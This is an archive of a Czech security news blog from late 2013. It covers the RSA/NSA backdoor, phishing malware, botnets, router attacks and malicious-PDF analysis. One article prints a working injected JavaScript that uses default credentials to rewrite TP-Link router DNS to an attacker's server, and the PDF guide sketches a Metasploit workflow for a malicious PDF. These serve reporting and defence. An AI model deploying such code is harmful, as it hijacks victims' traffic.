sobota 21. prosince 2013

NSA zaplatila 10 milionů dolarů za oslabení šifrovacího algoritmu RSA

Za tuto částku byl v některých aplikacích jako výchozí použit generátor náhodných čísel Dual_EC_DRBG obsahující backdoor.

O tom, že NSA vytvořila vadný algoritmus pro generování náhodných čísel, se vědělo již od září, kdy tuto informaci zveřejnil list New York Times. V Reuters zprávu doplnili a tvrdí, že hlavním distributorem toho chybného algoritmu byla společnost RSA, která ho používala jako výchozí například v softwarovém nástroji Bsafe.

Ovšem až nyní vyplavalo na povrch, že RSA za používání generátoru Dual_EC_DRBG obdržela 10 000 000$. Někomu se částka může zdát směšná, je ale potřeba si uvědomit, že částka představuje více než třetinu ročního přijmu této divize.

Zveřejnění spolupráce mezi RSA a NSA bylo pro bezpečnostní odborníky opravdu šokující, jelikož RSA vždy prosazovala soukromí a bezpečnost a v minulosti měla vedoucí úlohu v boji proti NSA, která navrhovala povinné použití speciálních čipů umožňujících odposlech rozličných počítačových a komunikačních prostředků.

RSA, nyní dceřiná společnosti EMC Corporation, po zveřejnění vyzvala zákazníky, aby přestali vadný algoritmus používat.

čtvrtek 5. prosince 2013

Policie ČR nachává vyřazovat domény ze zóny

K vyřazení domény nebylo potřeba rozhodnutí soudu, stačil souhlas státního zástupce.

Včera bylo ze zóny .cz vyřazeno doménové jméno Growshopu greenhome.cz. Podle aktuality, která se objevila na abclinuxu, doménu vyřadil správce české domény CZ.NIC na základě rozhodnutí Police ČR, které bylo vydáno dle ustanovení § 79e zákona č. 141/1961 Sb., trestní řádu.

Toto ustanovení se týká "Zajištění jiné majetkové hodnoty". Důležitá je hned první věta, která říká:

Nasvědčují-li zjištěné skutečnosti tomu, že jiná majetková hodnota, než která je uvedena v § 78 až 79d, je určena ke spáchání trestného činu nebo k jeho spáchání byla užita, nebo je výnosem z trestné činnosti, může předseda senátu a v přípravném řízení státní zástupce nebo policejní orgán rozhodnout o zajištění takové majetkové hodnoty. Policejní orgán k takovému rozhodnutí potřebuje předchozí souhlas státního zástupce.

Ve zkratce to znamená, že k zabavení domény Policii stačí pouze podezření, že byla použita k nějaké trestné činnosti, a rozhodnutí státního zástupce.

středa 4. prosince 2013

Falešné varování od MasterCard přináší malware

Znepokojující e-mail přišel do schránek několika tisíců uživatelů po celém světě.

Před Vánoci objevilo několik tisíc uživatelů znepokojující zprávu o tom, že jejich debitní karta byla dočasně zablokována. E-mail je po řemeslné stránce velmi dobře zpracován.

MasterCard phishing

Zjistili jsme neobvyklou aktivitu na Vašem debitním účtu. Z bezpečnostních důvodů byla karta dočasně zablokována. Pro odblokování vyplňte dokument v příloze a zašlete ho zpět na tuto adresu.

Příloha MasterCard_D77559FFA7.zip obsahuje variantu Trojanu Fareit, který se specializuje na krádeže soukromých dat a přihlašovacích údajů z prohlížečů a FTP klientů.

Malware je podle VirusTotal schopno detekovat pouze asi polovina antivirových řešení.

Po 20 let bylo heslo k odpálení amerických jaderných bomb 00000000

Vedení americké armády si tak chtělo zajistit možnost odpálení jaderných zbraní bez souhlasu prezidenta.

Kódy, známé pod zkratkou PAL, měly zabránit použití jaderných zbraní - a zejména jaderných zbraní pod společnou kontrolou zemí NATO - bez souhlasu prezidenta USA. Potřeba takové kontroly se objevila během tzv. kyperské krize, která probíhala v letech 1963-1964, kdy vyšlo najevo, že členské státy NATO Kypr a Turecko se pokusily použít společné jaderné zbraně jeden proti druhému.

Opatření zavedl tehdejší prezident USA J. F. Kennedy. Naneštěstí pro něj (a možná i pro celý svět) se armádním generálům nelíbilo, že by přišli o možnost odpálit mezikontinentální balistické střely typu Minuteman s jadernými hlavicemi prakticky podle vlastního uvážení, a tak sice nechali u všech sil zavést systém PAL, ale za heslo zvolili 8 nul.

Na řídícím serveru botnetu Pony bylo nalezeno přes 2 miliony kradených hesel

Uživatelská jména a hesla patří uživatelům služeb jako je Facebook, Twitter, Yahoo, Google, LinkedIn nebo třeba ADP.

Výzkumníkům ze SpiderLabs se podařilo dostat k serveru botnetu díky uniklým zdrojovým kódům. Nakonec se neprokázalo, že by se C&C server nacházel na území Nizozemska. Zde se nachází pouze proxy server, který útočník využívá pro skrytí své skutečné pozice.

botnet Pony - Logo

Hlavní činností botnetu Pony je krádež přihlašovacích údajů k čemukoliv, do čeho je potřeba se přihlašovat. A nutno říci, že se mu to daří velmi dobře. Podle informací od bezpečnostních odborníků ze SpiderLabs se na serveru nacházelo:

  • ~ 1580000 přihlašovacích údajů k webovým stránkám.
  • ~ 320000 přihlašovacích údajů k e-mailovým účtům.
  • ~ 41000 přihlašovacích údajů k FTP.
  • ~ 3000 přihlašovacích údajů ke správě vzdálené plochy.
  • ~ 3000 přihlašovacích údajů k SSH.

Zapomněl jsem zmínit, že malware funguje jako keylogger, který si "rozumí" s Firefoxem, Operou, Chromem, IE, Outlookem, Windows Mailem, rozličnými druhy FTP klientů a podobnými druhy aplikací.

úterý 3. prosince 2013

Potvrzeno: počítače opravdu mohou komunikovat pomocí reproduktorů a mikrofonu

Potvrdili to vědci z Fraunhofer Institute svým nejnovějším výzkumem.

To, o čem se v posledních dnech horlivě debatovalo a o čem se vedly mezi bezpečnostními odborníky boje takřka na život a na smrt, se stalo skutečností. Počítače spolu opravdu mohou komunikovat pouze pomocí reproduktoru a mikrofonu.

Potvrdila se tak slova v současné době lehce kontroverzního bezpečnostního odborníka Dragose Ruii, který se o tomto způsobu komunikace poprvé zmínil v souvislosti s malwarem nazvaným BadBios, který určitě není potřeba více představovat.

Vědcům se podařilo přenést data pomocí člověkem neslyšitelných vysokofrekvenčních zvukových vln na vzdálenost téměř 20 metrů. Pro svůj prototyp malwaru využili software původně určený pro tvorbu akustických signálů pro přenášení dat pod vodou.

Trochu limitující byla v tomto případě rychlost přenosu, výzkumníkům se podařilo z běžného počítače dostat maximálně 20 bitů za sekundu. Z toho vyplývá, že tímto způsobem nelze přenášet příliš velké množství dat, ovšem rychlost je dostatečná pro výměnu informací s nějakým C&C centrem.

Je tak dost dobře možné, že se v bodoucnu v kritických provozech setkáme s rušičkami vysokofrekvenčních signálů nebo s podobnými zařízeními. Zároveň se jedná také argument mluvící pro existenci BadBiosu. Uvidíme, co přinesou další dny.

Objevila se nová implementace Toru

Nová implementace se jmenuje Orchid a je napsaná v Javě.

Orchid může fungovat buď jako Tor klient, tedy jako SOCKS5 proxy, přes kterou směřujeme náš provoz, nebo jako knihovna připravená na použití v našich aplikacích. To je také důvod, proč byl Orchid vlastně vytvořen.

První aplikace se zabudovanou podporou Toru je Martus od společnosti Benetech.

Pod původním oznámením se rozjela zajímavá diskuze. Uživatelé například předpovídají, že knihovna bude často zneužívána různými druhy malwaru, přemítají o bezpečnosti Javy a ptají se sami sebe, proč vytvářet nové implementace, když jedna funguje poměrně dobře.

Pro fungování knihovny je potřeba Java 5+ nebo zařízení s Androidem. Orchid byl publikován pod licencí BSD a zdrojové kódy lze stáhnout z GitHubu.

Byla objevena bezpečnostní chyba v Seznamu

Chyba umožňuje útočníkovi odposlech hesla v nešifrované podobě.

Slabina byla objevena ve formuláři určeném pro registraci i v tom pro změnu hesla. Problém tkví ve způsobu, jak Seznam ověřuje sílu uživatelova hesla. Síla je totiž ověřována na straně serveru, kam se přenáší pomocí AJAXu a v nešifrované podobě.

Seznam.cz Vulnerability

Heslo je díky tomu snadno odposlechnutelné. Pokud se nám podáří stát se prostředníkem mezi uživatelem a serverem, je doba nutná k tomu, abychom naši obět donutili ke změně hesla, opravdu krátká.

Další, spíše filosofická otázka je, jestli jsou všechny takovéto dotazy logovány, jak se to obyčejně s GET dotazy děje.

pondělí 2. prosince 2013

Islandská pobočka společnosti Vodafone napadena hacktivisty

Unikly osobní informace asi 77 000 uživatelů, SMS zprávy a informace o zaměstnancích. Vodafone.is i všechny subdomény byly pozměněny.

Žádné techničtější detaily se mi bohužel nepodařilo zjistit. S ohledem na uniklé databázové soubory by mohlo jít o SQL Injection, ovšem jedná se pouze o spekulaci a je možné, že byl útok mnohem sofistikovanější.

Vodafone Iceland hacked

Za útokem stojí skupina tureckých hackerů vystupujících pod jménem Agent Hacker Group (@AgentCoOfficial). Důvodem k napadení Vodafonu byla snaha o protest proti praktikám NSA.

Zajímavé je, že doména je i v současné chvíli (tedy více než den po útoku) nedostupná.

neděle 1. prosince 2013

Telefony Google Nexus jsou náchylné na DoS útoky způsobené speciální SMS

Útočník může donutit telefon k restartu, způsobit zamrznutí nebo odpojit telefon od sítě.

Zranitelnost objevil Bogdan Alecu ze společnosti Levi9, který tvrdí, že v ohrožení jsou všechny přístroje poháněné Androidem 4.x, tedy Google Galaxy Nexus, Nexus 4 a Nexus 5.

Problém tkví v tom, jak zařízení nakládá se speciálním typem SMS zpráv, které jsou označované jako Flash SMS nebo 0 Class SMS.

Při testování různých druhů zpráv jsem si všiml, že při zaslání 0 Class SMS je pod oknem vykreslována další vrstva, která způsobuje, že je pozadí tmavší. Hned poté jsem se sám sebe zeptal: "Co se asi stane, když pošlu víc takových zpráv, bude pozadí pokaždé černat? Pokud ano, nemohlo by to způsobit přetížení paměti?". Odpověď na obě otázky je ANO, už 30 takových zpráv způsobí velice podivné chování.

Ke schození telefonu stačí zaslat přibližně 30 takových zpráv.

Alecu říká, že problém objevil už více než před rokem. Nejdříve se pokusil kontaktovat Google, který slibil, že oprava přijde s Androidem 4.3. Bohužel se tak nestalo a Bogdan Alecu se rozhodl zranitelnost prezentovat na letošní DefCamp konferenci, která se uskutečnila v Bukurešti. Společnost Google po zveřejnění oznámila, že celý případ v současnosti vyšetřuje. Pro ty, co nechtějí čekat na to, až s tím Google něco udělá, existuje aplice Class0Firewall app.

V populární WordPressové šabloně OptimizePress byla objevena kritická zranitelnost

V nebezpečí je tak tísíce stránek používajících tuto šablonu.

Zranitelnost se nachází v souboru wp-content/themes/OptimizePress/lib/admin/media-upload.php. Stránka umožňuje útočníkovi nahrát na server soubor jakéhokoliv typu. Po nahrání se soubor uloží do složky /wp-content/uploads/optpress/images_comingsoon/, která ještě ke všemu neobsahuje žádný soubor .htaccess ani index.php, takže při špatně nastavených pravidlech na serveru je možné procházet obsah složky.

OptimizePress vulnerability
Originální oznámení zranitelnosti

Exploit je velice jednoduchý a v současné době hojně využívaný. To potvrdil také můj rychlý průzkum, kdy jsem pomocí jednoduchého hledání zjistil více než 150 nakažených stránek. Mezi napadenými stránkami jsou i české a slovenské servery.

čtvrtek 28. listopadu 2013

Bezpečnostní tým Active24 zaznamenal další DDoS útok ze sítě RETN

Podle dostupných informací přichází útok ze stejné sítě, jako během březnových DoS útoků a cílem útoku není pouze síť společnosti ACTIVE 24.
Z technického hlediska jde o DNS amplification attack, při kterém je zneužívána doména fkfkfkfa.com.
DNS amplification attack (překládáno jako DNS zesilující útok) spočívá v posílání DNS dotazů se zdrojovou IP adresou nastavenou na IP adresu oběti. Tento útok je považován za jeden z nejsilnějších útoků, jelikož jeho zesílení může dosáhnout více jak 70 násobku původních dat.
Žádost o překlad mívá průměrně 80 B. Odpověď na takový dotaz může mít maximálně 512 B. To nám dává asi šestinásobné zesílení. Šikovnější útočník využije DNS server s podporou EDNS, což je rozšíření, které umožňuje odpovědi větší než 4 KB.
Možná se ptáte, jak může být odpověď tak velká. Je to jednoduché. Součástí EDNS odpovědi jsou totiž také TXT záznamy, do kterých útočník uloží schválně dlouhé řetězce.

AirBank upozorňuje na novou vlnu podvodných emailů

Bankovní instituce AirBank upozorňuje na "obzvlášť vykutálený typ hackerského útoku na klienty bank".

Scénář celého útoku je nám všem velice dobře známý. Vše začíná e-mailem, který se tváří, jako kdyby pocházel z České pošty, a obsahuje škodlivou přílohu a odkaz na phishingovou stránku. Phishingová stránka vyzve uživatele ke stažení mobilní aplikace (většinou nazvané "Smartphone Security Software 3S"). Pokud si uživatel aplikaci stáhne, získá útočník, krom přihlašovacích údajů pomocí kterých se uživatel pokusí přihlásit, přístup k potvrzovacím SMS zprávám, které jsou potřeba k provedení plateb. Proti útoku oběti nepomůže ani dvoufaktorová autentizace.

U této příležitosti vydala banka seznam deseti dobrých rad pro bezpečné používání internetu. Pro našince je to stará písnička, ale říká se, že opakování je matka moudrosti, takže:

  1. Nepřihlašujte se na počítači, kterému nevěříte.
  2. Pravidelně aktualizujte prohlížeč, operační systém i všechny ostatní aplikace.
  3. Vždy si hlídejte, že má stránka platný SSL certifikát (viz obrázek)
  4. Používejte antivirový program
  5. přihlašujte výhradně z webu banky, jiným odkazům nevěřte.
  6. Nevěřte mailům, které po vás chtějí vaše hesla nebo telefonní číslo. Nikdy takové údaje nikomu neposílejte, i když se tváří jako důvěryhodná instituce.
  7. Neinstalujte na svůj telefon nebo počítač aplikace z nedůvěryhodných zdrojů.
  8. Hlídejte si svůj telefon a používejte zámek k zamčení displeje.
  9. Nikdy nikomu neříkejte svá hesla.
  10. Zkontrolujte si, jak máte nastavené limity na převody peněz.

Útočíme na domácí routery pomocí JavaScriptu

Internetoví zločinci se pomocí JavaScriptu snaží měnit nastavení DNS serverů u domácích routerů a tím se stát prostředníkem mezi uživatelem a internetem.

Skript, který je za celý útok zodpovědný, nezabere, i v případě, že se hodně snažím, ani 20 řádků. Funguje na jednoduchém principu, totiž nejdříve ověří dostupnost routeru načtením http://admin:admin@192.168.1.1/images/logo.jpg a v případě úspěchu přistoupí k samotným změnám konfigurace.

if (MSIE = navigator.userAgent.indexOf("MSIE") == -1) {
    document.writeln("<div style='display:none'>");

    function ip1() {
        i = new Image;
        i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip1()>');

    function ip3() {
        ii = new Image;
        ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip3()>');
    document.writeln("</div>");
}

Jak si můžeme všimnout, tak útočník předpokládá, že jsou na routeru výchozí přihlašovací údaje a že je přístupný z adresy 192.168.1.1.

Funkce ip1() a ip3() jsou v našem případě zodpovědné za samotnou změnu DNS serverů. Nahrazením DNS serverů se z útočník stává Man-in-the-middle a získává přístup k celé komunikaci své oběti.

Tento skript napadá pouze routery společnosti TP-Link, ale k rozšíření portfolia napadnutelných routerů není potřeba příliš mnoho práce.

středa 27. listopadu 2013

Na černém trhu se objevil nový crimepack jménem Atrax

Mezi funkce Atraxu patří sledování provozu uživatelů, získávání dat z formulářů, těžba Bitcoinů i Litecoinů, krádeže BTC peněženek a jiných osobních dat nebo provádění DDoS útoků.

Celá komunikace mezi kontrolním a řídícím centrem a oběťmi probíhá přes síť Tor, což zaručuje relativní anonymitu. Komunikace přes Tor není žádnou novinkou, v poslední době podobným způsobem fungoval třeba botnet Mevada nebo Skynet.


Zdroj: http://www.ibtimes.com/

Na crimepacku je sympatická také jeho cena. Pár základních modulů bude případného zájemce stát přibližně 250 USD. V ceně jsou také aktualizace, opravy chyb a podpora.

Není pochyb o tom, že Atrax má všechny předpoklady pro to, stát se jedním z nejúspěšnějších crimepacků na černém trhu. Uvidíme, možná o něm ještě uslyšíme.

NIX.CZ uvedl video "Svět propojovacích uzlů"

Osvětové video se snaží ve zjednodušené a srozumitelné formě ukázat, jak funguje internet a jeho propojovací uzly.

Pěti a půl minutové video vytvořil český peeringový uzel NIX.CZ ve spolupráci s EURO-IX.

Smyslem filmu, který vznikl ve spolupráci několika předních evropských propojovacích uzlů, je ukázat především na to, čemu se tyto společnosti věnují. Důležitým odkazem snímku je také to, že Internet je otevřený systém, který vytvářejí sami jeho uživatelé, a to tím, že jsou schopni a ochotni spolupracovat. Martin Semrád, výkonný ředitel sdružení NIX.CZ.

úterý 26. listopadu 2013

Malware mířící na AutoCAD dláždí cestu budoucím útokům

Bezpečnostní výzkumníci z Trend Micro objevili nový a vzácný druh malwaru, který se tváří jako legitimní AutoCAD komponenta s příponou .fas, ale ve skutečnosti vytváří v systému díry, které jsou následně využívány k další infiltraci systému.

Malware byl označen jako ACM_SHENZ.A. Po otevření souboru je Trojanem vytvořen uživatelský účet s administrátorskými právy (většinou se nový účet jmenuje servicer), poté se pokusí zápisem do registrů vyřadit firewall, následně vytvoří ze všech diskových jednotek disky sdílené a nakonec otevře porty 137-139 (NetBIOS porty) a 445 (SMB). Útočník pak může zneužít známých chyb v SMB protokolu a tím mu odpadá nutnost crackování hesel, jelikož bude mít na postíženém systému rovnou administrátorská práva.


Ukázka zdrojového kódu malwaru

Trojan se na systém oběti dostavá buď stažením z nezabezpečených webů, nebo je do systému vložen jiným škodlivým kódem. Malware se zaměřuje zejména na firemní počítače, jelikož doma provozuje AutoCAD jen malý počet uživatelů. Za relativní úspěch může zřejmě to, že uživatelé nečekají, že by mohl být soubor s touto příponou vůbec škodlivý.

Historicky je malware mířící na AutoCAD velmi vzácný. V poslední době ovšem začíná být mezi útočníky stále více oblíbený, připomeňme si například trojan Medre, který byl odhalen v červnu tohoto roku.

Indická centrální banka napadena pakistánskými aktivisty

Oficiální webové stránky byly přetvořeny pakistánskými aktivisty z Pakistan Cyber Army a Team MaDLeeTs.

Podle všech indícií je deface reakcí na ranní útoky za kterými stojí Indian Cyber Army a které měli za následek znetvoření nebo znepřístupnění velkého množství pakistánských stránek.

Důvodem pro indické útoky bylo 5. výročí teroristických útoků na Bombaj. Pakistánští teroristé provedli 26.11.2008 deset bombových útoků v různých částech této metropole. Bombové útoky a následná střelba měla za následek nejméně 173 zabitých a 208 zraněných.

Z dánské bitcoinové směnárny BIPS byly ukradeny bitcoiny za více než milion dolarů

Tentokrát se tedy crackerům podařilo ukrást více než 1200 bitcoinů.

Společnost zatím neposkytla o útoku žádné bližší informace. Údajně v současné chvíli probíhá vyšetřování celého incidentu a obesílání poškozených uživatelů.

Provozovatelé BIPS vydali k útoku tiskovou zprávu, kde mimo jiné oznámili, že pozastavují provoz všech pěněženek a zaměří se na činnosti, které nezahrnují skladování bitcoinů.

Tento měsíc je to již třetí napadená bitcoinová služba. Na začátku měsíce se neznámému útočníkovi podařilo z bitcoinové peněženky inputs.io zcitit přes 4000 BTC a o pár dní později zmizelo z české směnárny bitcash.cz asi 500 BTC.

pondělí 25. listopadu 2013

Analýza škodlivých PDF souborů

Portable Document Format je možná vůbec nejrozšířenější formát pro sdílení dokumentů. Je používán jak jednotlivci, tak firmami, ke sdílení katalogů, faktur, knih, prostě všeho, co vás jenom napadne. Velmi oblíben je také mezi kyberzločinci. Pojďme si tedy ukázat nejen to, jak zjistit, jestli je soubor nějakým způsobem škodlivý, ale také to, jak formát PDF vypadá, a nesmíme opomenout ani to, jak se takový škodlivý soubor tvoří.
Tento článek je překladem originálu "Analyzing Malicious PDFs" od Rohita Shawa, který vyšel na webu www.infosecinstitute.com.
Předchozí roky nebyly pro uživatele příliš dobré. Bylo zveřejněno několik kritických zranitelností, například velice populární byl exploit zneužívající buffer overflow v Adobe Readeru do verze 9. Když se útočníkovi podaří dostat zhoubný soubor k uživateli, ať už pomocí sociálního inženýrství či prostým umístěním na internet, stačí ke spuštění škodlivého kódu pouhý akt otevření dokumentu. Většina útočníků pochopitelně poskytne uživateli původní soubor, takže si oběť nějaké neobvyklé aktivity ani nevšimne.
Adobe Reader - nejvíce zneužívaná aplikace - graf
Adobe Reader je vůbec nejzneužívanější aplikace posledních let (http://www.investintech.com/)
Jak jste si pravděpodobně všimli, PDF soubory jsou velice často součástí masových e-mailových kampaní. Tyto kampaně bývají bohužel velice často úspěšné. Abychom se nestali jednou z obětí, měli bychom vědět, jak takový zákeřný soubor odhalit (Někteří možná namítnou, že stačí neotvírat neznáme e-maily, což je sice pravda, ale k takovému dokumentu lze přijít i jinak).

Struktura PDF

Struktura PDF dokumentu
Formát PDF je schopný zobrazovat veliké množství obsahu (statický a dynamický). Dohromady tyto prvky tvoří vizuálně atraktivní, interaktivní a velice přenosný dokument. I když si všichni užíváme výhod, které z těchto funkcí plynou, má to i svou temnější stránku. Dynamický obsah v PDF souborů může totiž skrývat škodlivý obsah, který je často využíván k instalaci malwaru či ke krádežím osobních údajů.

Struktura PDF dokumentu

Základní struktura PDF dokumentu
  • Hlavička - obsahuje verzi PDF
  • Tělo - obsahuje sérii objektů použitých v souboru
  • Tabulka odkazů - obsahuje konkrétní pozice v souboru, na kterých začíná daný objekt
  • Závěrečná sekvence - obsahuje pozici na které začíná tabulka odkazů
Objekty, která lze použít v PDF souboru:
  • Logické hodnoty (Boolean) - Mohou nabývat hodnot true nebo false. Používají se jako hodnoty v polích (arrays) nebo slovnících (dictionaries), dále jako výsledek výpočetních funkcí PostScriptu nebo jako operandy podmíněných operátorů if a ifelse.
  • Čísla (Numbers) - Formát PDF zná dva typy numerických objektů: integer a real. Integer reprezentuje celá čísla, zatímco real reprezentuje čísla reálná. Rozsah a přesnost jsou závislé na uživatelském počítači.
  • Řetězce (Strings) - String objekt je složený ze série bajtů s hodnotami v rozsahu 0 až 255. Zápis těchto objektů je možné provádět dvěma způsoby
    • Sekvence unsigned integerů uzavřených v kulatých závorkách ().
    • Sekvence hexadecimálních dat uzavřených v lomených závorkách <>.
  • Jména (Names) - Jméno je atomický objekt jedinečně definován sekvencí znaků. Z toho vyplývá, že dva jmenné objekty sestávající ze stejné sekvence znaků jsou stejný objekt, a že nemají vnitřní strukturu. Jméno začíná lomítkem (/) a mezi lomítkem a samotným jménem nesmí být žádné bílé znaky.
  • Pole (Arrays) - Array objekt je ve formátu PDF chápán jako jednorozměrná množina sekvenčně seřazených objektů. Zapisuje se jako sekvence objektů uzavřených v hranatých závorkách [].
  • Slovníky (Dictionaries) - Slovník je vlastně asociativní pole, prvky (values) nejsou tedy indexovány posloupností celých čísel, nýbrž pomocí klíčů (keys). Klíč musí být, na rozdíl od hodnoty, která může být jakéhokoliv typu, vždy typu Jméno. Slovník se zapisuje jako sekvence párů klíč-hodnota uzavřených ve dvojitých lomených závorkách <<>>.
  • Streamy (Streams) - Stream je podobně jako string sekvence bajtů. PDF aplikace mohou ovšem číst stream postupně, zatím co řetězce musí byt přečteny celé najednou. Stream má zároveň neomezenou velikost, z toho důvodu jsou takto vkládány objekty s velkým množstvím dat, jako třeba obrázky nebo popisy stránek.
  • Nulové objekty (Null objects) - má typ a hodnotu, která se nerovná žádnému jinému objektu. Existuje jenom jeden objekt typu null, označený pomocí klíčového slova null.
(Původní článek se strukturou PDF dokumentu příliš nezabývá, dovolil jsem si ho tedy trošku rozšířit. Pokud chcete vědět o struktuře PDF souborů víc, mohu vás odkázat na článek na wikipedii.)

Vytváření škodlivého PDF

Nejčastěji je škodlivý kód napsaný v JavaScriptu, jelikož lze k exploitaci použít techniku heap sprayingu.

Ve chvíli, kdy oběť otevře nakažený PDF dokument, spustí se JavaScriptový kód, který spustí shell kód a z internetu se stáhne trojský kůň.
K vytvoření zákeřného souboru využijeme JavaScriptovou funkci util.printf(), která způsobí přetečení bufferu.

Vytvoření takové souboru by mohlo vypadat nějak takto:
  1. Otevřeme msfconsoli a spustíme následující příkazy.
  2. Jakmile budeme mít všechny možnosti nastavené tak, jak chceme, můžeme spustit exploit a vytvořit náš škodlivý soubor.
  3. Ještě před tím, než pošleme vytvořený soubor obětí, musíme nastavit listener k přijímání zpětných spojení.
  4. Ve chvíli, kdy oběť otevře PDF dokument, je zřízena relace a my můžeme pomocí meterpreteru přistupovat k systému oběti.

Analýza PDF dokumentu

Analýza PDF souboru zahrnuje přezkoumávání, dekódování a extrahování obsahu podezřelých objektů, které mohou být využity k exploitaci zranitelnosti v Adobe Readeru. Naštěstí nemusíme vše dělat ručně, práci nám ušetří stále se zvětšující počet online a offline analyzérů..

Online analyzéry

Při každém, byť sebemenším, podezření je dobré prozkoumat potenciálně nebezpečné dokumenty některým z mnoha online analyzérů. Ten nahraný škodlivý PDF soubor otestuje na většinu známých exploitů a ihned vrátí výsledek.

Wapewet

Wepawet je služba pro detekci a analýzu webového malwaru. V současné době podporuje nejen formát PDF, ale také Flash či JavaScript. Wepawet je dostupný na adresehttp://wepawet.iseclab.org a pro otestování souboru ho stačí nahrát nebo vložit odkaz na zdroj v internetu.

PDF Examiner

PDF Examiner od Malware Tracker je schopný, podobně jako Wapevet, najít v uploadovaném PDF souboru desítky známých exploitů. Navíc umožňuje uživateli zobrazit si přesnou strukturu dokumentu, což se nám bude velice hodit, pokud budeme chtít nějaký dokument testovat ručně. Nástroj najdete na www.malwaretracker.com.

Offline analyzéry

Pokud chceme PDF dokument testovat ručně, budou se nám hodit následující aplikace.

PDF Stream Dumper

Hned po instalaci PDF Stream Dumperu nahrajeme podezřelý soubor a program ihned začne s analýzou. V pravém sloupci jsou barevně rozlišené různé objekty, například červenou barvou je zvýrazněn JavaScript.
Nástroj, podobně jako ostatní aplikace, dokáže odhalit veliké množství známých exploitů. Pokud chceme náš soubor na tyto exploity otestovat , stačí kliknout na "Exploits scan". V našem škodlivém dokumentu PDF Stream Dumper správně indikuje exploit zranitelnosti CVE-2008-2992.

Peepdf

Peepdf je nástroj napsaný v Pythonu, který slouží k prozkoumání souborů PDF za účelem zjistit, zda je soubor škodlivý či nikoliv. Cílem tohoto nástroje je poskytnout bezpečnostnímu výzkumníkovi všechny potřebné komponenty pro průzkum PDF dokumentů v jedné aplikaci a nahradit tak 3-4 jiné aplikace.
Pojďme tedy analyzovat náš maliciouspdf.pdf.
Pokud PDFko obsahuje nějaké JavaScriptové objekty, je nám k dispozici JS příkaz, který takový objekt podrobí důkladné analýze. V případě, že byl kód navázán na nějaký spustitelný soubor, Peepdf nám zobrazí URl adresu, na které je takový soubor umístěn.

Origami

Origami je Ruby framework navržený k parsování, analýze a vytváření PDF dokumentů. Krom zjištění, jestli se v PDFku škodlivý kód nenachází, nám může pomoci také při vytváření takovýchto zákeřných dokumentů.

Pdfid

Pdfid je nástroj, který nám zprostředkuje velice užitečné informace o PDF souboru. Zejména se pokouší o extrahování informací v hlavičce, jako je například JavaScriptový kód, různé objekty, streamy a podobně. Pdfid nám tedy pomůže zjistit, co se vlastně uvnitř dokumentu děje.

Závěr

V předchozích letech bylo objeveno několik desítek zranitelností a jejich počet se ze dne na den zvětšuje. Z toho vyplývá, že je potřeba před otevřením analyzovat každý PDF soubor, jelikož prostý akt otevření dokumentu může vést ke stažení malwaru z internetu. K analýze je možné použít různé automatické online a offline nástroje. Pro zmenšení pravděpodobnosti kompromitace je vhodné používat alternativní prohlížeče (SumatraPDF, Foxit, PDF XChange), instalovat poslední aktualizace a v Adobe Readeru zakázat spouštění JavaScriptu.

Reference

  • http://cs.wikipedia.org/wiki/Portable_Document_Format
  • www.slideshare.net/null0x00/client-side-exploits-using-pdf
  • blog.zeltser.com/post/3235995383/pdf-stream-dumper-malicious-file-analysis
  • www.infosec.gov.hk/sc_chi/promotion/files/20100311_04.pdf



neděle 24. listopadu 2013

Malware z dílny NSA infikoval asi 50 000 počítačových sítí

Mezi zeměmi, kde by měl malware operovat, se pravděpodobně nachází i Česká republika.
Podle tajných dokumentů, které zveřejnil Edward Snowden, se NSA podařilo malwarem infikovat více než 50 000 počítačových sítí na celém světě.
Malware byl údajně navržen za účelem shromažďování citlivých informací. Bezpečnostní odborníci z nízkého počtu napadených sítí vyvozují, že cílem útoků byli telekomunikační společnosti, banky nebo třeba poskytovatelé internetu. Ti všichni mají totiž přístup k velkému počtu osobních dat.
Zajímavé je, že o útoku nejen věděly, ale možná se na něm i podílely, tajné služby Velké Británie, Kanady, Austrálie a Nového Zélandu.

pátek 22. listopadu 2013

Systém asymetrické kryptografie NTRU je dostupný pod open source licencí

NTRU je pod licencí GPL možné použít v open source aplikacích, pro komerční projekty je připravena proprietární licence. Díky tomu, jak je systém NTRU navržen, není možné šifru prolomit pomocí Shorova algoritmu (narozdíl od RSA či ECC), takže je odolný i proti útokům kvantových počítačů.

středa 20. listopadu 2013

Slabá hesla uživatelů GitHub terčem brute force útoku

Uživatelé serveru GitHub používající slabá hesla se stali oběťmi brute force útoku.

Podle blogového zápisku, který se objevil bezprostředně po útoku, se podařilo překonat obrané mechanismy omezující počet pokusů při zadávání hesla tím, že bylo pro útok použito okolo 40 000 unikátních IP adres. Napadeným uživatelům byla resetována hesla, osobní přístupové tokeny a SSH klíče byli smazány, takže je potřeba vytvořit nové.

Brute force útok, neboli útok hrubou silou, je snaha o rozluštění šifry (v našem případě hesla) bez znalosti jejího klíče. V praxi se jedná o systematické testování všech možných kombinací.

Vývojáři GitHubu doporučují používat dvoufaktorovou autorizaci a silná hesla. Díky útoku již nebude možné použití slabého čí slovníkového hesla.

pondělí 11. listopadu 2013

Mezinárodní vesmírná stanice nakažena malwarem

Vir byl na palubu ISS dopraven pomocí nakažených USB flash disků ruských kosmonautů.

Nikde není bezpečno. Dokonce i v chladném vesmíru si malware našel svou cestu. Podle bezpečnostního experta Eugena Kasperskyho byly SCADA systémy na palubě Mezinárodní vesmírné stanice napadeny proslulým počítačovým červem nazývaným Stuxnet.

Stuxnet asi není třeba nějak více představovat, postačí tak, když si řekneme, že se jedná o počítačový vir pravděpodobně armádního původu, který úspěšně infikoval íránskou jadernou elektrárnu Búšehr, resp. počítače s nainstalovaným řídícím systémem Siemens, které ovládají centrifugy na obohacování uranu.

Aby toho nebylo málo, tak se také objevila zpráva, že jedna nejmenovaná ruská jaderná elektrárna, která je odpojená od internetu, byla napadena stejným typem malwaru. Jak elektrárna dopadla Kaspersky nespecifikoval.

Počítačový zločinci ukrývají bankovní trojany do RTF souborů

